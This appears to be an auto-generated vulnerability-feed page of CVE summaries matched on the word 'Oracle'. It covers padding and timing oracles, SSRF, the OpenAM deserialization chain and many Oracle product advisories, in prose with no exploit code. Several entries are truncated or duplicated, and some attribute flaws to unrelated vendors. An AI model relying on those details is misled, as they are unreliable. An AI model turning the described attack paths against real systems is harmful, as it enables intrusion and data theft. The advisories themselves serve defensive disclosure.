Oracle

Padding oracle vulnerability in wolfSSL's PKCS7 CBC decryption allows unauthenticated remote attackers to recover plaintext through repeated decryption queries with modified ciphertext, exploiting insufficient validation of interior padding bytes. The vulnerability requires high attack complexity and persistent attacker interaction but presents practical risk to systems using affected wolfSSL versions for PKCS7-encrypted communications.

Padding oracle attack in Apache Tomcat EncryptInterceptor leaks encrypted session data confidentiality across versions 7.0.100-7.0.109, 8.5.38-8.5.100, 9.0.13-9.0.115, 10.0.0-M1-10.1.52, and 11.0.0-M1-11.0.18 when default configuration is deployed. Unauthenticated remote attackers exploit oracle responses to decrypt sensitive information without authentication (CVSS:3.1 AV:N/AC:L/PR:N). CWE-209 (information exposure through error messages) enables cryptographic side-channel extraction. No public exploit identified at time of analysis; low observed exploitation activity (EPSS 0.02%).

Server-Side Request Forgery in n8n-mcp (npm package) versions ≤2.47.3 allows authenticated attackers with valid AUTH_TOKEN to force the server to issue HTTP requests to arbitrary URLs via manipulated multi-tenant HTTP headers (x-n8n-url, x-n8n-key). Response bodies are reflected through JSON-RPC, enabling unauthorized access to cloud instance metadata endpoints (AWS IMDS, GCP, Azure, Oracle, Alibaba), internal network services, and any host reachable by the server process. Multi-tenant HTTP deployments with shared or multiple AUTH_TOKENs are at highest risk. No public exploit identified at time of analysis.

Remote code execution in OpenIdentityPlatform OpenAM 16.0.5 and earlier allows unauthenticated attackers to execute arbitrary OS commands via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypass exploits an unpatched deserialization sink in JATO's ClientSession.deserializeAttributes() that was overlooked when CVE-2021-35464 was mitigated. Attackers can target any JATO ViewBean endpoint with <jato:form> tags (commonly found in password reset pages) using a PriorityQueue→TemplatesImpl gadget chain with libraries bundled in OpenAM's WAR file. Vendor-released patch available in version 16.0.6 (GitHub commit 014007c). No public exploit code identified at time of analysis, but detailed technical writeup with gadget chain specifics has been published.

Server-Side Request Forgery in pyLoad-ng allows authenticated users with ADD permissions to read local files via file:// protocol, access internal network services, and exfiltrate cloud metadata. The parse_urls API endpoint fetches arbitrary URLs without protocol validation, enabling attackers to read /etc/passwd, configuration files, SQLite databases, and AWS/GCP metadata endpoints at 169.254.169.254. Error-based responses create a file existence oracle. Multi-protocol support (file://, gopher://, dict://) escalates impact beyond standard HTTP SSRF. CVSS 7.7 reflects network attack vector, low complexity, and scope change with high confidentiality impact. No public exploit code identified at time of analysis, though detailed proof-of-concept included in advisory demonstrates exploitation via curl commands against Docker deployments.

Parse Server versions prior to 8.6.70 and 9.7.0-alpha.18 allow authenticated users with find class-level permissions to bypass protectedFields restrictions on LiveQuery subscriptions by submitting array-like objects with numeric keys instead of proper arrays in $or, $and, or $nor operators. This enables information disclosure through a binary oracle attack that reveals whether protected fields match attacker-supplied values. The vulnerability requires prior authentication and find-level access but no user interaction, affecting all deployments of vulnerable Parse Server versions.

Node.js versions 20.x, 22.x, 24.x, and 25.x use non-constant-time comparison for HMAC signature verification, allowing remote attackers to infer valid HMAC values through timing oracle attacks. The vulnerability leaks information proportional to matching bytes and requires high-resolution timing measurement capability, making exploitation feasible in controlled network conditions. CVSS 5.9 (confidentiality impact only); no public exploit identified at time of analysis.

OX Dovecot Pro's doveadm HTTP service is vulnerable to timing oracle attacks during credential verification, allowing remote unauthenticated attackers to enumerate valid credentials through timing analysis and gain full administrative access to the doveadm management interface. The vulnerability affects OX Dovecot Pro installations with exposed doveadm HTTP service ports, carries a CVSS score of 7.4, and has no public exploit identified at time of analysis.

AVideo password verification API endpoint allows unauthenticated attackers to brute-force video access passwords at network speed with no rate limiting, enabling compromise of password-protected video content across the platform. The vulnerable endpoint pkg:composer/wwbn_avideo returns a boolean confirmation for any password guess without authentication, CAPTCHA, or throttling mechanisms, combined with plaintext password storage and loose equality comparison that further weakens defenses. Publicly available exploit code exists demonstrating rapid password enumeration against any video ID.

An information disclosure vulnerability in Parse Server's LiveQuery functionality allows attackers to infer the values of protected fields by monitoring whether update events are generated when those fields change, effectively creating a binary oracle that reveals field modifications despite the field values themselves being stripped from event payloads. The vulnerability affects Parse Server npm package across multiple versions, and while no public exploit code or active exploitation has been documented, the attack requires only standard subscription capabilities without elevated privileges. The vendor has released patches that validate the watch parameter against protected fields at subscription time, mirroring existing where clause protections.

phpseclib versions 1.0.26 and below, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a padding oracle timing attack when using AES in CBC mode, allowing attackers to decrypt sensitive data through cryptanalysis of response timing differences. This information disclosure vulnerability affects any PHP application using the vulnerable phpseclib library for AES-CBC encryption. Although no CVSS score, EPSS data, or confirmed active exploitation (KEV status) are currently available, the presence of a verified fix and security advisory indicates this is a legitimate cryptographic weakness requiring attention.

A critical authentication bypass vulnerability in Oracle Identity Manager and Oracle Web Services Manager allows remote attackers to completely compromise affected systems without any credentials. The vulnerability resides in the REST WebServices and Web Services Security components, affecting versions 12.2.1.4.0 and 14.1.2.1.0 of both products. With a CVSS score of 9.8 and no authentication required, this represents a severe risk to identity management infrastructure, though no current KEV listing or public POC has been documented in available sources.

Unauthenticated attackers can stream any private or paid video in PHP, Oracle, and Apple applications through a path traversal vulnerability in the HLS streaming endpoint. The flaw exploits a split-oracle condition where authorization validation and file access use different parsing logic on the videoDirectory parameter, allowing attackers to bypass authentication checks while accessing unauthorized content. No patch is currently available for this high-severity vulnerability.

This is a critical unauthenticated remote code execution vulnerability in Oracle Edge Cloud Infrastructure Designer and Visualisation Toolkit version 0.3.0. An attacker with network access via HTTP can completely take over the affected system without any authentication, privileges, or user interaction required. The CVSS score of 9.8 reflects maximum impact across confidentiality, integrity, and availability. There is no evidence of active exploitation (not in CISA KEV), and no proof-of-concept code has been publicly identified in the available intelligence.

A cryptographic vulnerability in the Stanford Javascript Crypto Library (SJCL) allows attackers to recover victims' ECDH private keys through a missing point-on-curve validation flaw. The vulnerability affects all versions of SJCL and enables remote attackers to send specially crafted off-curve public keys and observe ECDH outputs to extract private key material. A proof-of-concept exploit is publicly available, though the vulnerability is not currently listed in CISA KEV and has no EPSS score assigned yet.

Authlib's implementation of the JWE RSA1_5 key management algorithm contains a padding oracle vulnerability that leaks decryption failures through timing and exception patterns, allowing attackers to decrypt sensitive data without the private key. The library disabled the constant-time protections provided by the underlying cryptography library and raises exceptions before tag validation completes, creating a reliable side-channel. Public exploit code exists for this vulnerability affecting Authlib users in Python and related Oracle products.

The ha-mcp OAuth consent form (beta feature) accepts a user-supplied `ha_url` and makes a server-side HTTP request to `{ha_url}/api/config` with no URL validation. An unauthenticated attacker can submit arbitrary URLs to perform internal network reconnaissance via an error oracle. Two additional code paths in OAuth tool calls (REST and WebSocket) are affected by the same primitive. The primary deployment method (private URL with pre-configured `HOMEASSISTANT_TOKEN`) is not affected. **Code path 1 - Consent form validation** (reported) When a user submits the OAuth consent form, `_validate_ha_credentials()` (`provider.py`) makes a server-side GET request to `{ha_url}/api/config` with no scheme, IP, or domain validation. Different exception types produce distinct error messages, creating an error oracle: | Outcome | Message returned | Information leaked | |---------|------------------|--------------------| | `ConnectError` | "Could not connect..." | Host down or port closed | | `TimeoutException` | "Connection timed out..." | Host up, port filtered | | HTTP 401 | "Invalid access token..." | Service alive, requires auth | | HTTP 403 | "Access forbidden..." | Service alive, forbidden | | HTTP ≥ 400 | "Failed to connect: HTTP {N}" | Service alive, exact status | An attacker can drive the flow programmatically: register a client via open DCR (`POST /register`), initiate authorization, extract a `txn_id`, and submit arbitrary `ha_url` values. No user interaction required. **Code path 2 - REST tool calls with forged token** OAuth access tokens are stateless base64-encoded JSON payloads (`{"ha_url": "...", "ha_token": "..."}`). Since tokens are not signed, an attacker can forge a token with an arbitrary `ha_url`. REST tool calls then make HTTP requests to hardcoded HA API paths on that host (`/config`, `/states`, `/services`, etc.). JSON responses are returned to the caller. In practice, path control is limited - most endpoints use absolute paths that ignore the `ha_url` path component. Useful exfiltration requires the target to return JSON at HA API paths, which is unlikely for non-HA services. **Code path 3 - WebSocket tool calls with forged token** The same forged token triggers WebSocket connections to `ws://{ha_url}/api/websocket`. The client follows the HA WebSocket handshake protocol (waits for `auth_required`, sends `auth`, expects `auth_ok`). Non-HA targets fail at the protocol level and return nothing useful. Realistic exploitation is limited to pivoting to another HA instance on the internal network. **Confirmed:** Internal network reconnaissance via error oracle (all 3 code paths). An attacker can map reachable hosts and open ports from the server's network position. OAuth mode is a **beta** feature, documented separately in `docs/OAUTH.md` and not part of the main setup instructions. The standard deployment method (pre-configured `HOMEASSISTANT_URL` and `HOMEASSISTANT_TOKEN`) is not affected. Upgrade to 7.0.0

Vm Virtualbox versions up to 7.1.14 contains a vulnerability that allows attackers to takeover of Oracle VM VirtualBox (CVSS 8.2).

Vm Virtualbox versions up to 7.1.14 contains a vulnerability that allows attackers to unauthorized creation, deletion or modification access to critical data or all O (CVSS 8.1).

Vm Virtualbox versions up to 7.1.14 contains a vulnerability that allows attackers to takeover of Oracle VM VirtualBox (CVSS 8.2).

Vm Virtualbox versions up to 7.1.14 contains a vulnerability that allows attackers to takeover of Oracle VM VirtualBox (CVSS 8.2).

Vm Virtualbox versions up to 7.1.14 contains a vulnerability that allows attackers to unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 7.1).

Vm Virtualbox versions up to 7.1.14 contains a vulnerability that allows attackers to unauthorized access to critical data or complete access to all Oracle VM Virtual (CVSS 6.0).

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 4.6 MEDIUM]

Life Sciences Central Coding versions up to 7.0.1.0 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of Oracle Life Sciences Cen (CVSS 6.5).

Unauthorized data access in Oracle Planning and Budgeting Cloud Service (version 25.04.07) can be achieved by high-privileged attackers with local infrastructure access through the EPM Agent component. The vulnerability requires user interaction from a non-attacker and allows complete compromise of accessible Planning and Budgeting data. No patch is currently available.

Flexcube Universal Banking contains a vulnerability that allows attackers to unauthorized access to critical data or complete access to all Oracle FLEXCUBE U (CVSS 6.5).

Vulnerability in the Oracle Zero Data Loss Recovery Appliance Software product of Oracle Zero Data Loss Recovery Appliance (component: Security). Supported versions that are affected are 23.1.0-23.1.202509. [CVSS 3.1 LOW]

Business Intelligence versions up to 7.6.0.0.0 contains a vulnerability that allows attackers to unauthorized creation, deletion or modification access to critical data or all O (CVSS 7.1).

Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19.3-19.29 and 21.3-21.20. [CVSS 4.5 MEDIUM]

Unauthenticated attackers can read sensitive data from Oracle Life Sciences Central Designer 7.0.1.0 through an easily exploitable information disclosure vulnerability accessible via HTTP. The flaw requires no user interaction or privileges, allowing remote attackers with network access to gain unauthorized access to a subset of application data. No patch is currently available for this vulnerability.

Flexcube Investor Servicing versions up to 14.5.0.15.0 contains a vulnerability that allows attackers to unauthorized creation, deletion or modification access to critical data or all O (CVSS 8.1).

Configurator contains a vulnerability that allows attackers to unauthorized read access to a subset of Oracle Configurator accessible data (CVSS 5.3).

Peoplesoft Supply Chain Management Purchasing versions up to 9.2 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of PeopleSoft Enterprise SC (CVSS 5.4).

Life Sciences Central Designer versions up to 7.0.1.0 contains a vulnerability that allows attackers to unauthorized access to critical data or complete access to all Oracle Life Scien (CVSS 6.5).

Oracle Agile PLM for Process has a CVSS 9.8 vulnerability in the Supply Chain Sourcing component that allows unauthenticated remote attackers to fully compromise the system.

Mysql Server contains a vulnerability that allows attackers to unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 6.5).

Hospitality Opera 5 versions up to 5.6.19.23 contains a vulnerability that allows attackers to unauthorized access to critical data or complete access to all Oracle Hospitalit (CVSS 8.6).

Hospitality Opera 5 versions up to 5.6.19.23 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of Oracle Hospitality OPERA (CVSS 6.1).

Mysql Server contains a vulnerability that allows attackers to unauthorized ability to cause a partial denial of service (partial DOS) of MySQL (CVSS 2.7).

Mysql contains a vulnerability that allows attackers to unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 4.9).

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 6.0 MEDIUM]

Oracle HTTP Server and WebLogic Server Proxy Plug-in have a CVSS 10.0 access control vulnerability allowing unauthenticated network attackers to fully compromise the middleware layer.

Unauthenticated attackers can exploit a cross-site request forgery vulnerability in Oracle PeopleSoft Enterprise HCM Human Resources 9.2 through the Company Directory/Org Chart Viewer component to read, modify, or delete sensitive employee data via HTTP with user interaction. The vulnerability requires a victim to click a malicious link but impacts multiple PeopleSoft products and modules beyond the initial target. No patch is currently available for this medium-severity issue (CVSS 6.1).

Oracle Applications DBA versions 12.2.3-12.2.15 contain an authorization flaw in the Java utilities component that allows high-privileged attackers to gain unauthorized read and write access to sensitive data via HTTP. An authenticated attacker with administrative credentials can exploit this vulnerability to create, modify, or delete critical application data without restriction. A patch is available and should be prioritized for deployment in affected Oracle E-Business Suite environments.

Unauthorized data disclosure in Oracle Workflow Loader (versions 12.2.3-12.2.15) allows high-privileged attackers with network access to extract sensitive information from the Oracle E-Business Suite environment. The vulnerability requires administrator-level credentials and HTTP connectivity but can result in complete exposure of workflow-accessible data. A patch is available to remediate this confidentiality issue.

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 8.2 HIGH]

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 8.2 HIGH]

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 9.0.0-9.5.0. [CVSS 4.9 MEDIUM]

Peoplesoft Enterprise Peopletools versions up to 8.60 is affected by cross-site scripting (xss) (CVSS 6.1).

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. [CVSS 6.5 MEDIUM]

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. [CVSS 6.5 MEDIUM]

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. [CVSS 4.9 MEDIUM]

Vulnerability in Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u471-b50. [CVSS 3.1 LOW]

JD Edwards EnterpriseOne Tools versions 9.2.0.0 through 9.2.26.0 are vulnerable to cross-site scripting (XSS) in the Web Runtime SEC component, allowing unauthenticated attackers to manipulate data and read sensitive information through HTTP with user interaction. The vulnerability has network-wide scope, potentially compromising connected systems beyond the primary application. No patch is currently available.

Remote denial of service in Oracle Java SE, GraalVM for JDK, and GraalVM Enterprise Edition allows unauthenticated attackers to trigger application hangs or crashes via network-accessible protocols. Multiple Java versions including JDK 8u471, 11.0.29, 17.0.17, 21.0.9, and 25.0.1 are affected through a flaw in the Security component. No patch is currently available for this high-severity vulnerability.

Agile Product Lifecycle Management For Process versions up to 6.2.4 is affected by cross-site scripting (xss) (CVSS 6.5).

Reflected cross-site scripting in Oracle E-Business Suite Scripting Admin (versions 12.2.3-12.2.15) allows unauthenticated attackers to modify or read sensitive data via malicious HTTP requests that require user interaction. The vulnerability can impact other Oracle products due to scope changes and currently lacks an available patch. CVSS 6.1 (Medium) reflects low-complexity network-based exploitation with confidentiality and integrity impacts.

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystems). Supported versions that are affected are 10 and 11. [CVSS 5.0 MEDIUM]

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. [CVSS 4.9 MEDIUM]

Unauthenticated attackers can access sensitive data in Oracle Agile PLM 9.3.6 through an HTTP network request targeting the User and User Group component, potentially exposing all accessible information within the application. This easily exploitable vulnerability requires no user interaction and affects Oracle Supply Chain Products Suite deployments. No patch is currently available.

Vulnerability in the SQLcl component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.0. [CVSS 7.0 HIGH]

Peoplesoft Enterprise Peopletools versions up to 8.60 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of PeopleSoft Enterprise Pe (CVSS 6.1).

Mysql Server contains a vulnerability that allows attackers to unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 4.9).

Mysql Cluster contains a vulnerability that allows attackers to unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 4.9).

Solaris versions up to 11 contains a vulnerability that allows attackers to unauthorized creation, deletion or modification access to critical data or all O (CVSS 5.8).

Peoplesoft Enterprise Peopletools versions up to 8.60 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of PeopleSoft Enterprise Pe (CVSS 5.4).

Graalvm versions up to 21.3.16 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of Oracle Java SE, Oracle G (CVSS 6.1).

Graalvm versions up to 21.3.16 contains a vulnerability that allows attackers to unauthorized creation, deletion or modification access to critical data or all O (CVSS 7.4).

Apex versions up to 23.2.0 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of Oracle APEX Sample Appli (CVSS 5.4).

Sun Zfs Storage Appliance Kit versions up to 8.8.0 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of Oracle ZFS Storage Appli (CVSS 2.3).

Mysql Server contains a vulnerability that allows attackers to unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 5.3).

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. [CVSS 5.3 MEDIUM]

Solaris versions up to 10 contains a vulnerability that allows attackers to unauthorized creation, deletion or modification access to critical data or all O (CVSS 5.8).

Siebel Customer Relationship Management Deployment contains a vulnerability that allows attackers to unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 7.5).

Graalvm versions up to 21.3.16 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of Oracle Java SE, Oracle G (CVSS 4.8).

Utilities Framework versions up to 4.3.0.3.0 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of Oracle Utilities Applica (CVSS 5.4).

Life Sciences Central Designer versions up to 7.0.1.0 contains a vulnerability that allows attackers to unauthorized update, insert or delete access to some of Oracle Life Sciences Cen (CVSS 6.5).

Planning And Budgeting Cloud Service contains a vulnerability that allows attackers to unauthorized creation, deletion or modification access to critical data or all O (CVSS 4.2).

eGovFramework/egovframe-common-components versions up to and including 4.3.1 includes Web Editor image upload and related file delivery functionality that uses symmetric encryption to protect URL. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows. Rated high severity (CVSS 8.6), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows. Rated high severity (CVSS 8.6), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

Dataease is an open source data visualization analysis tool. Rated high severity (CVSS 8.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix defrag path triggering jbd2 ASSERT code path: ocfs2_ioctl_move_extents ocfs2_move_extents ocfs2_defrag_extent __ocfs2_move_extent + ocfs2_journal_access_di ...

It is possible to bypass the clipping level of authentication attempts in SolaX Cloud through the use of the 'Forgot Password' functionality as an oracle. Rated medium severity (CVSS 6.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

Padding oracle attack vulnerability in Oberon microsystem AG’s Oberon PSA Crypto library in all versions since 1.0.0 and prior to 1.5.1 allows an attacker to recover plaintexts via timing. Rated medium severity (CVSS 5.9), this vulnerability is no authentication required. No vendor patch available.